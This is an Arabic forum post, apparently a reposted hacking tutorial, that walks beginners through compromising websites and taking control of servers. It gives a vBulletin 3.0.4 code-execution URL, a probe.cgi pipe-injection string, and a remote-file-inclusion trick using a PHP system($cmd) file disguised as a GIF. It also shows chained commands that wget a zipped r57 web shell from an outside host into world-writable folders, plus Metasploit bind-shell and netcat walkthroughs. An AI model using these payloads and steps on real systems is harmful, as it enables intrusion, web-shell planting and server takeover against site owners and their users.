منتدى الطيب

::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... Gwgt0-10

انضم إلى المنتدى ، فالأمر سريع وسهل

منتدى الطيب

::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... Gwgt0-10

منتدى الطيب

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

مرحب بكم

ابحث

الدخول السريع

أبريل 2024

الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
1234567
891011121314
15161718192021
22232425262728
2930     

اليومية اليومية


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...

    admin
    admin
    المدير
    المدير


    عدد المساهمات : 141
    تاريخ التسجيل : 25/01/2010
    العمر : 27
    الموقع : https://altaiyb.ahlamontada.com/

    منقول ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...

    مُساهمة من طرف admin الإثنين يوليو 01, 2013 7:29 am


    شرح هذا تعبة والله عليه علي شانكم وشي ثاني ذكر حقوق الكاتب

    الي جمع لكم دروس
    والي صحيح يبي يكون هكر يفهم شرح زين لو كام طويل بس مفيد

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEN1

    وكمــا تري ... إن إصدار 3.0.4 من المنتدي يوجد له ثغرتان....

    الآن بعد ما نضغط على زر الثغره

    vBulletin <= 3.0.4froumdisplay.php"Code Execution ( Part2)

    راح يطلع لك التالي ...


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN2

    و كود الثغرة بيظهر على حسب الثغره بالـ Perl ولا بالـ php ولا مكتوب الاستغلال على طول من المتصفح كما فى المثال بتاعنا ...

    ( وسأوضح بعض الثغرات المختلفة , وكيفية التعامل معها )

    المهــــــــم ... راح يطلع الكود التالي ...


    Exploit:
    --------------

    رمز:
    http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

    Conditions:
    ----------------
    1st condition : $vboptions['showforumusers'] == True , the admin must set
    showforumusers ON in vbulletin options.

    2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

    3rd condition : $DB_site->fetch_array($forumusers) == True , when you
    visit the forums, it must has at least one user show the forum.

    4th condition : magic_quotes_gpc must be OFF

    SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
    init.php by secret array GLOBALS[]=1 Wink))

    طيب وش معناه الكلام ذا ؟!,,
    يقولك إن الثغره تستغلها عن طريق إضافة الرابط هذا ...




    رمز:


    وتحط بدال site الموقع المستهدف ومعطيك شروط لاشتغال الثغره ... بس إنت ما عليك منه ... رح طبق وشف وش يصير ...

    ......... طبعا مو شرط تستخدم هذه الثغره فقط .........

    ... كل موقع أو كل إصدار وثغراته ...

    طيب نروح للمنتدى ونكتب بعده الكود اللي عطانا ...


    مثل ما قلنا بالأول إنه فرضاً اسم الموقع

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    ولنفرض انك ضغطت على رابط المنتدى وصار اسم المجلد vb يعني صار الرابط

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    نضيف الرابط بعده

    رمز:

    وتشوف مكان id ...ونضع مكانه أوامر اللينكس ( وسأشرح كيفية استخدام هذه الأوامر )
    طيب بعد ما كتبت id وطلع لك مثلا ...
    uid=100(apache) gid=500(apache) groups=500(apache)

    او


    uid=100(nobody) gid=500(nobody)


    كويس تنفذت الثغرة ... وعطاك رد وهو ... إن حالتك نو بدي (nobody) على السيرفر ,,,

    وإذا ما نفعت الثغرة دي ... شوف غيرها , وغيرها , وغيرها ووو وابحث فى كل مواقع الـ Security عن ثغرة لهذا الإصدار من المنتدي...

    وأكمل شغلك ... وإذا ما لقيت ثغرة لهذا الإصدار من المنتدي ... شوف باقي البرامج , والخدمات ... اللي شغالة... عـ الموقع....

    ودور لها علي ثغرات .....

    *** فقـــط ... أكمل , وتابع الشرح , وإن شاء الله ... هتعرف كل شئ ببساطة ***

    المهـــــــــــــــم !!!
    هنفترض إن الثغرة اشتغلت معانا ....


    الحين اكتب pwd ( مكان الـ id ) لمعرفه مكانك على السيرفر ...


    رمز:
    لاحظ !!! قمنا بحذف id ( الموجودة فى آخر الكود ... فى المستعرض )وكتابة pwd

    وبعد معرفة مكـــانك على السيرفر ... ( يعني إنت موجود الآن فى مجلد إيه !!! ... على السيرفر )


    قم بتنفيذ هذا الأمر ls -al عشان تشوف المجلدات والملفات وتصاريحها ودور علي مجلد يحمل تصريح 777 وبتشوف قدامه drwxrwxrwx

    هذا على طول تدخله

    وتسحب له الشل بطريقه هذي


    cd أمر الدخول
    ومثلاً قالك مسارك على السيرفر كذا بعد ما كتبت pwd


    /home/domains/admin.com/public_html/vb

    وشفت إن مجلد اسمه data يحمل التصريح 777
    تروح تكتب الأمر التالي علشان تدخل مجلد الـ data مثلاً
    cd home/domains/admin.com/public_html/vb/data
    لازم تكتب الأمر اللي فوق وتشبك فيه أمر السحب بعد عشان ينفذ أمرين الدخول و السحب , ويكون بالطريقه هذي,,,


    رمز:
    cd home/domains/admin.com/public_html/vb/data;wget http://members.com/shell.zip;ls -al

    لو لاحظتوا كل أمر نفصله بهذي العلامة ; وزدنا أمر استعراض الملفات أيضا ... يعني بينفذ كذا أمر مع بعض ,,, فى وقت واحد....

    لاحــــــــــظ!!!


    أمر الدخول أو الانتقال لمجلد معين cd +

    أمر السحب
    wget

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    +

    أمر الاستعراض ls -al


    طبعا إنت تكون رافع الشل وضاغطه في ملف مضغوط وتسحبه على السيرفر بالطريقه اللي وضحتها

    وإذا شفته انسحب ... أوكيه ... إذا ما انسحب تأكد من صلاحية الأمر

    wget بكتابه الأمر التالي:::


    which wget


    إذا عطاك مسار مشابه لهذا


    /usr/da/


    يعني اوكي شغال .... ((( شغـــال , ولا سواق ... هههههه )))


    أو جرب باقي أوامر السحب مثل curl و get و lynx كل هذي تأدي الغرض وتفك مشاكل كثيرة يعانون منها المبتدئين...

    جرب الأداة curl
    وتسحب بالطريقه هذي...

    curl -o shell.zip

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    أو بـ get
    بالطريقه التالية :::

    GET

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    > shell.zip

    أو بـ lynx
    بالطريقه التالية :::

    lynx -source

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    > shell.zip



    بعد ما سحبته واستعرضت وشفت إن الملف موجود .... تكتب الأمر هذا unzip ... لفك الضغط عن الشل...

    cd home/domains/admin.com/public_html/vb/data;unzip shell.zip;ls -al

    طبعا لازم تكتب أمر الدخول كل مره ... بس تضيف عليه اي أمر إضافي لأنك تبي تطبق على المجلد اللي يحمل التصريح ...

    مش على المجلد اللي إنت فيه


    طيب بعد ما فكيت الشل وصار shell.php


    تروح تطلبه من المتصفح وبعدها شوف الموقع قدامك بمكانك ...افعل ما أردت ... عن طريق أوامر اللينكس

    ( سوف تجد في أسفل الموضوع شرح للـ Shell + أوامر اللينكس )

    وأيضاً ...


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3



    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    وكده إحنـــا قمنا باستغلال ثغرة من ضمن الثغرات الموجودة في منتدي Vb 3.0.4 ومن خلالها قمنا برفع شل وطبقنا أوامرنا وووو ....

    وأيضاً ممكن تستغل ألبوم الصور إذا موجود فى الموقع 4images : وده له ثغرات , وممكن تبحث عنها بنفس الطريقة السابقة ...

    وأيضاً ممكن تستغل سجل الزوار : نروح نشوف له ثغرات ؟؟ إذا كان له ثغرات أوكي ... نبحث , ونطبق وإذا ماله انتقل للي بعده...

    وأيضاً ممكن تستغل باقي الخدمات الموجودة على الموقع ... وتعمل بحث علي كل برنامج أو ثغرة أو خدمة معينة ... ووو ...

    * طبعاً إنت بتشوف الخدمات اللي شغالة علي الموقع أو تعمل عليها Scan مسح كما ذكرنا سابقاً , وبعد كده تروح تبحث علي ثغرات لهذه الخدمات , بنفس طريقة البحث اللي شرحناها *

    *******************

    والآن !!! سأوضح بعض الثغرات المختلفة , وكيفية التعامل معها ....



    ( وبإمكانك مراجعة درس استغلال نقاط الضعف + طريقة البحث عن الثغرات فى مواقع الـ Security ... وستجد فيه بعض من أنواع الثغرات

    المختلفة + طريقة البحث عنها أيضاً , وكيفية التعامل معهــا )

    المهم
    بنشرح عمل ثلاث أنواع من الثغرات وهي ما تسمى...



    (( Remote command exucetion )) & (( Remote File Inclusion )) & (( Framework ))



    وهي تسمح لك برفع شل أو باكدور أو أو أو ,,,,,,الخ
    أول حاجه لازم يكون عندك شل Shell مرفوع بموقعك أو احد المواقع,,,

    مثل هذا الشل الروسي r57 مثلاً , أو Ch99 ... ( سأوضح أنواع الشل ... + روابط لتحميلها ...لاحقاً )

    المهم ...

    ================================================== =========
    ================================================== =========



    النوع الأول ثغرات Remote command exucetion



    ================================================== ========
    ================================================== ========

    طيب خلينا نجيب ثغره ونطبق ... وعنوان الثغرة كذا ...مثــلاً ...

    Probe.cgi Remote Command Execution



    يعني بملف Probe.cgi فيه ثغره رموت كومند Remote Command حلو ...طيب خلونا نشوف الاكسبلويت

    ( السورس بتاع الثغرة .... )



    Authors ....... spher3 (spher3 at fatalimpulse dot net)
    Date .......... 04-07-2005
    Product ....... probe.cgi
    Type .......... Remote Command Execution

    o Info:
    ================
    That script is used to open file '.dat'.

    o Vulnerable Code:
    ================
    ..
    23 [...]
    24 $old = $query->param('olddat');
    25 [...]
    ..
    ..
    34 [...]
    35 open (VF, "$olddat");
    36 [...]
    ..

    (24) At this line, the cgi param 'olddat' is associated to one database.
    This variable isn't checked by anyone matching, so you can open
    all file that you want. (35) At this line the script open the file
    that you had chosen. With pipe `|`
    is possible to execute arbitrary code on the shell.


    o Proof of concept:
    ================

    http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
    uid=99(www) gid=99(www)





    لو تقرأ بأعلى موضح لك الملف ونوع الثغرة ,,,,, طيب احنا عوزين الاستثمار ...

    استثمارها هنا بالسطر ده ...



    http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|



    the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

    cgi-bin<<===مجلد الـ cgi-bin

    probe.cgi<<===الملف المصاب

    olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
    ===============

    طيب نبغى نعرف كيفية عملها اوكي

    اولاً ... تسوي بحث بالطريقه هذي

    allinurl:probe.cgi

    أو اي طريقة تحب

    لنفرض اننا حصلنا علي موقع




    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    كويس أول حاجه نضع



    |id|



    بيطلع بالشكل



    www.???.com/cgi.bin/probe.cgi?grid=|id|


    واعطيه انتر بيظهر لك مثلا كذا

    uid=99(www) gid=99(www)

    هذا صفتك ( صلاحيتك ) بالسيرفر


    طيب نبغى نعرف مكاننا وين ( يعني احنا في أى مجلد علي السيرفر )



    ضع مكان الـ id


    pwd



    www.???.com/cgi.bin/probe.cgi?grid=|pwd|



    بيطلع معك مثلا...



    /home/.???/cgi.bin



    طيب نبغى نشوف مسموح لينا نرفع ملف ولا لا؟

    ضع مكان الـ id



    which wget



    بالشكل,,,,,,,,,



    www.???.com/cgi.bin/probe.cgi?grid=|which wget|



    إذا ظهر لك كدا ...



    /؟؟؟/؟؟؟/wget



    وعلامات الاستفهام متغيرة يعني أهم شئ wget تظهر ... فإذا ظهرت ... فاعرف إن وضعك زي الـفــل...

    يعني مسموح لك ترفع ملف ... انبسط ياعم ...

    طيب نبغى نعرف التصاريح : permits للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

    لو ترجع احنا قلنا مكاننا وين هنا



    /home/.???/cgi.bin



    طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري ( المجلد ) الرئيسي ... حلو !

    نضع مكان الـ id



    cd /home/.???/;pwd



    يعني بيكون بالشكل



    www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|



    الآن بيرجعنا إلى ...



    home/.???/



    حلو الآن ... نبغى نشوف المجلدات والملفات و التصريحات بالأمر ...



    ;ls%20-al



    بيطلع كذا,,,,,



    www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|



    بتظهر لك ملفات ومجلدات الموقع وأمامهم تصريحاتهم...

    إنت ابحث عن المجلد اللي له التصريح



    drwxrwxrwx = 777



    لنفرض انك حصلت أمام مجلد الصور أو uploads تصريح ( drwxrwxrwx = 777 )

    أولا ... لازم تخش عليه ... تعمل



    cd home/.???/uploads/;pwd



    www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|



    حلو بيكون وضعك بالشكل



    home/.???/uploads/



    يعني داخل مجلد uploads

    الآن كل ما عليك رفع الشل ... طبعا لك شل مرفوع بأحد المواقع ... يعني نفترض رابط شيلك Your Shell




    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    وتبغي ترفعه على الموقع اللي اخترقته ... بيكون بالشكل ده ......



    www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57shell.zip*|



    واعطيه انتر Enter بيظهر لك :::



    r57shell.zip



    طيب نبغى نفك الضغط عنه بالأمر unzip



    www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57shell.zip*|



    وديلو إنتر Enter بيطلع معك :::



    r57shell.php



    وألف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3


    ( سأشرح ... كيف تتعامل مع الشل Shell , وكيف تستخدم أوامره , وما الذي تفعله بعد رفع الـ Shell ... لاحقاً )



    ================================================== ========================
    ================================================== ========================



    ننتقل للقسم الثاني وهي ثغرات Remote File Inclusion



    ================================================== ========================
    ================================================== ========================


    الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution

    بس الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه لاستثمار أو الهجوم

    خلونا نأخذ مثال للتوضيح ... ولنأخذ هذه الثغرة ...مثال :::



    الاستغلال :



    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    لو تلاحظ بالاستغلال




    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3





    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3
    = موقعك

    ?&cmd = كود مرفوع بموقعك :



    **********

    افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif



    system($cmd);
    ?>

    */



    **********

    أنا رافعه على موقعي

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    وعند الاستغلال




    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3




    الـ id بالآخر تضع مكانها أوامر اللينكس... ( كما شرحت فى الأعلي )



    والفرق بين Remote Command Execution و Remote File Inclusion



    أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))

    و Remote Command Execution تستخدم أوامر اللينكس على طول بدون كود مرفوع (( الـ id فقط ))


    ================================================== ========================
    ================================================== ========================



    ننتقل للقسم الثالث وهي ثغرات مكتوبة بالـ Framework . ( وامتدادها بيكون pm )



    ================================================== ========================
    ================================================== ========================
    أولاً : حمل برنامج Metasploit Framework من هـنـــا



    بعــد تثبيت البرنامج ...

    بإمكانك تشغيل البرنامج عـ ( الـ Windows )...

    وبالمناسبة ... أوامر البرنامج ثابتة ... سواء فى اللينكس , أو الويندوز ...

    ودلوقتي خلونا نشوف شرح للبرنامج , وكيفية استخدامه , من عـ الـ Windows ....



    روح لمكان البرنامج ... علي هذا المسار ...



    C:Program Files/Metasploit Framework



    ( إذا كنت الويندوز موجود فى الـ C ) أما إذا كان الويندوز موجود فى الـ D بيكون المسار كالتالي :::



    D:Program Files/Metasploit Framework

    .............



    واضغط على أيقونة البرنامج الموضح بالصورة :::

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN3

    أو ممكن تذهب إلي قائمة Start ثم Programs ثم Metasploit Framework ثم MSFConsole ...



    وبعد ما تضغط على أيقونة البرنامج هاتفتح معك الشاشة ... التالية :::

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN4

    ونضع ملف الثغرة اللي احنا عايزنها في هذا المسار...



    C:\Program Files\Metasploit Framework\home\framework\exploits



    مع ملاحظة ::: الثغرة هاتكون بامتداد ((( pm )))


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN5



    طبعا ممكن تفتح ملف الثغرة بالـ Notepad ... وبتلاحظ الاسم بتاع الثغره بأعلى الاكسبلويت...


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN6

    للتشغيل الثغره اكتب الأمر زي ما هو



    use php_vb3_0_6

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN7


    طيب هنستعرض الخيارات المتاحة لنا للتطبيق بالأمر...



    show payloads

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN8

    ظهر لنا الخيارات وهنختار منها cmd_generic بالأمر...



    set PAYLOAD cmd_generic

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN9

    طيب هنشوف الخيارات التي بداخل الخيار cmd_generic بالأمر



    show options


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN10

    حلو جداً ,,,,,, نستخدم الخيارات بالترتيب بالأوامر


    set RHOST server's IP



    server's IP <<-------------- آي بي IP ::: الموقع المستهدف



    ,,,,,,,,,,,,,,



    set RPATH /vb/misc.php



    vb/misc.php<<-------------مكان الإصابة وهو متغير



    ,,,,,,,,,,,,,,

    وأيضا الأمر...



    set RPORT 80



    ,,,,,,,,,,,,,



    وبعده الأمر



    set LHOST myIP



    myIP<<-------------- الآي بي IP بتاعك


    ,,,,,,,,,,,,,



    وأيضا الأمر



    set LPORT 1234



    والبورت أنت حٌر ... ممكن تغيره ... بس لازم هو نفسه عند الاتصال بالنت كات


    ,,,,,,,,,,,,,



    والآن ... استخدم أوامر اللينكس بالأمر ...



    set CMD id



    والآن شوفوا الصورة عند استخدام الأوامر


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN11


    الآن روح وافتح النت كات وتنصت به ... بالأمر



    nc -vv -l -p 1234



    لاحظو ... البورت هو نفسه اللي بالأول وضعناه...



    ,,,,,,,,,,,,,



    وأخيراً ... نستخدم الأمر ...


    exploit


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN12


    وانتظر,,,,,هتظهر النتيجة بالنت كات

    طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
    المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبة بالــFramework



    *******

    وهذا شرح ثاني لثغرة مكتوبة بـ برنامج Metasploit Framework



    وطبعاً هي بامتداد pm



    واسم الثغرة ::: futuresoft_tftpd.pm



    وهذا هو رابط الثغرة ( افتحه ) ووو

    futuresoft_tftpd_pm.txt


    وانسخ كامل كود الاستغلال إلى ملف نصي , ونسمي الملف futuresoft_tftpd.pm


    لأن كود الاستغلال يبدأ بـ Msf::Exploit::futuresoft_tftpd ولأن فيه كلمة MsF Exploit تبقي الثغرة مكتوبة ببرنامج Metasploit Framework



    ولازم يكون امتدادها pm ... لذلك احنا كتبنا اسم الملف وأضفنا إليه .pm

    futuresoft_tftpd.pm


    انسخ الملف futuresoft_tftpd.pm إلى المجلد الخاص بثغرات البرنامج

    C:\Program Files\Metasploit Framework\home\framework\exploits


    -


    والآن شغل Metasploit Framework , من قائمة start ثم Metasploit Framework وشغل MSFConsole
    ستبدأ نافذة الدوس Dos في الظهور بشعار Metasploit ,,, نبدأ بتنفيذ الأوامر

    1- الأمر الأول use وهو لتحديد اسم الثغرة التي سنستخدمها وهي futuresoft_tftpd لاحظ بدون pm
    بمعنى أول أمر نستخدمه هو : use futuresoft_tftpd وستلاحظ تغير سطر الأوامر إلى msf futuresoft_tftpd >
    لاحظ الصورة:

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN13


    ثانياً: أمر show أو العرض ينقسم إلى 3 أنواع :::
    الأول ::: show options وهو لإظهار وتحديد اختيارات الثغرة مثل رقم المنفذ Port وعنوان ip
    الثاني ::: show payloads لإظهار وتحديد الشل كود shellcode الذي ستقوم بتنفيذه
    الثالث ::: show targets لإظهار الهدف المحدد مثل نظام تشغيل أو تطبيق ويب مع تحديد الإصدار

    نبدأ بأول نقطة : نفذ show options وستلاحظ ظهور 3 خصائص :::
    1 SSL وهذا الاختيار لا نستخدمه إلى إذا كان الموقع يستخدم شهادة التحقق https
    2 رقم ip و 3 البورت Port وتلاحظ أن البورت محدد 69 ,,, لاحظ كيف سنقوم بإعادة التحديد

    لتحديد ip الموقع المستهدف ... سنستخدم أمر جديد وهو set , لاحظ سنحدد ip و port
    بهذا الشكل set RHOST 127.0.0.1 و set RPORT 69 لاحظ الصورة

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN17

    بعد ذلك تحديد payloads أو shellcode ويوفر Metasploit أنواع كثيرة وإحترافية للـ shellcode
    لرؤيتها وتحديدها نفذ الأمر show payloads
    لاحظ سنقوم باختيار الشل كود المعروف لفتح منفذ جديد أو باب خلفي للدخول للجهاز وهو win32_bind
    نفذ الأمر set PAYLOAD win32_bind لاحظ الصورة التوضيحية:

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN14
    بعد ذلك تحديد الهدف targets , نفذ الأمر show targets لعرض أنواع الهدف وفي مثالنا
    الأهداف المتوفرة :
    0 - Windows 2000 Pro English ALL
    1 - Windows XP Pro SP0/SP1 Englis
    2 - Windows NT SP5/SP6a English
    3 - Windows 2003 Server English
    ونستطيع تحديد الهدف , لاحظ سنقوم باختيار WinXP sp0/sp1 بمعنى الاختيار 1
    بهذا الشكل :::

    set TARGET 1
    -
    وبعد الانتهاء من إعدادات الثغره , نفذ أمر show options , للتأكد من كل الخصائص
    بهذا الشكل :::


    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... JEEN15



    وبهذا نكون انتهينا وللتطبيق تأكد أن النظام winxp sp0 أو sp1 وأن البرنامج :::

    TFTP Server 2000 Evaluation Version 1.0.0.1 شغال عـ الموقع
    والآن نفذ الثغره باستخدام الأمر exploit



    وبهذا نكون أخذنا فكرة عن أداة أثبتت جدارتها في عالم الأمن وهي Metasploit Framework



    ولا تستغرب إذا كان فيه فرق بين الشرح الأول لـ Metasploit Framework والشرح الثاني ...

    * فالطريقة الأولي صحيحة , وسهلة ,,, وأيضاً الطريقة الثانية كذلك *


    وبالتوفيق للجميع ....



    ***********************

    *************

    ******

    *





    $*******$



    طيب الحين خلصنا من الاختراق عن طريق السكربتات اللي مركبه على الموقع ,,,

    وأيضاً ... اتعرفنا علي بعض الثغرات المهمة جداً , وعرفنا كيف نقوم باستغلالها ...


    ننتقل لمرحله أكثر تقدم ....
    نروح لموقع netcraft.com

    وتكتب في مربع البحث اسم الموقع اللي تبيه...
    بيطلع لك معلومات الموقع من الـ IP للموقع والخدمات المركبه على السيرفر ... وهكذا ... ومثلاً عطاك المعلومات التالية :::


    202.75.49.183 Linux Apache/1.3.34 Unix mod_ssl/2.8.25 OpenSSL/0.9.7a PHP

    /4.4.2 mod_perl/1.29 FrontPage/5.0.2.2510



    نأخذه وحده وحده
    النظام بيشتغل على Linux
    ومركب سيرفر Apache إصدار 1.3.34
    أول شي تشوف لينكس وثغراته زي ما تعلمنا قبل كده ...
    بعدين انتقل للأباتش ودور له علي ثغرات تناسب الإصدار الموجود ,,, وإذا ما لقيت أو ما ضبط ... انتقل للي بعده...
    mod_ssl/2.8.25 مود يتركب على سيرفر الأباتش وشف له ثغرات...
    OpenSSL/0.9.7a دور له علي ثغرات
    PHP/4.4.2 دور له علي ثغرات

    طبعاً ... إنت بتدور علي الثغرات ... بنفس الطريقة اللي قلنا عليها قبل كده ...

    عن طريق البحث فى مواقع السيكيورتي....

    وعلي فكرة ... لو قدرت تبحث وتطلع ثغرات للخدمات الموجودة علي الموقع مثل : Appache أو OpenSSL/0.9.7a أو mod_ssl/2.8.25 أو أو أو

    وعرفت تطبقها ... أعتقد إن إنت كده أصبحت ((( هاكر ::: بدائي ))) يستطيع أن يكون محترف

    خلوا بالكوا ... ((( هاكر ::: بدائي ))) وليس محترف ... لأن عالم الاختراق ... ملئ بالاكتشافات... والمواهب , والأفكار الجديدة...

    والمحترف ... هو اللي بيكون صاحب هذه الاكتشافات , والمواهب , والأفكار الجديدة ....


    $*******$

    وهــا هو شرح الـشــــل...

    ما هو الشل؟؟؟؟ هو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux

    حيث يستقبل الأوامر منك ويرسلها إلى السيرفر المخترق وتعرض نتائج الأوامر على الشل...

    والآن ما الفائدة منه؟؟؟ لان الكل يسمع عن الشل وما يعرف شنو استخداماته؟؟ وأنا أقولك له استخدامات كثيرة

    فنحن الهاكرز نستخدمه في السيطرة على السيرفرات ......

    والآن جينا للمفيد يستخدم للسيطرة على السيرفر وأحياناً السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر وتصفح ملفاته والتعديل عليها وهذا حسب صلاحياتك على السيرفر

    وأكيد راح تقولي شنو صلاحياتي ؟؟ وأنا أقولك الصلاحيات يعني شنو إنت على السيرفر اي شنو موقعك من الإعراب هههههههههه وإليكم أنواع الصلاحيات على السيرفر

    1_ Root اي أنت مدير السيرفر يعني خلاص ما في شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا ......

    2- User هنا صلاحياتك على الموقع اللي إنت رفعت عليه شل فقط ... أكرر على الموقع اللي إنت رفعت عليه شل فقط ...

    اي تعدل تعطي تصاريح إلا إذا انتقلت لحالة الرووت

    3- nobody, http, apache هنا كلها نفس الشئ ما تقدر تحذف ملفات أو تعطي تصاريح للملفات ولكن هذه الصلاحيات فيها ميزة حلوة وهي

    انك تقدر تتصفح الحسابات اللي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع اللي إنت رفعت عليه شل فقط

    ولكن في سؤال مهم وهي أكيد إنت راح تقولي كيف اعرف صلاحياتي على السيرفر؟؟؟ وأنا أقولك وإنت في الشل تكتب id لمعرفة صلاحياتك

    ؛؛؛ وهو أمر لينكس ؛؛؛

    درسنا ممل اليوم ههههههههههه اتحملوني يـا شباب أنا أخوكم معلش ...

    ومن الكلام اللي سبق أكيد إنت استنجت شئ ... وهو انك حتى تشغل الشل لازم ترفعه على موقع

    وأكيد في سؤال بالطريق وهو كيف ارفع الشل على موقع؟؟؟

    وأنا أقولك ولا يهمك يتم رفع الشل عن طريق الثغرات وأكيد راح تسأل وتقول وش هي الثغرة؟؟؟؟ وأنا أجاوبك مع انك مللتني من كثر أسألتك ههههههههههه

    الثغرة: وهي عبارة عن خطأ برمجي وضعف أمني يساعدك في دخول نظام معين واختراقه .....

    وأحيانا تساعدك الثغرة في الانتقال من حالة إلى أخرى أي مثلا من نوبدي nobody إلى رووت Root حسب نوع الثغرة .....

    والثغرات تكون مكتوبة بلغة السي C أو البيرل Prel أو php الخ.....

    والآن الحمد لله عرفتوا شنو الثغرة ......

    ولنفترض إنك تمكنت من رفع شل على موقع ولكن أكيد إنت تبي تعرف أنواع الشل؟؟ وأنا أقولك إنت تأمر ...

    بعض الأنواع:


    1- webadmin هذا الشل جيل ومفيد للمبتدئين لأنه يسمحلك برفع الملفات وحذف الملفات وإنشاء مجلد بكل سهولة ولتطبيق أمر معين مثلا

    على ملف كل ما عليك هو انك تضغط على المكان الفارغ أمام الملف المراد التعديل عليه واختار اللي تبي تعديل حذف او غيره كذلك تستطيع

    حذف مجلد كامل فهو لا يحتاج إلى أوامر لينكس.

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3



    2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على أوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه ورابط التحميل للشل

    ::: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ... D3



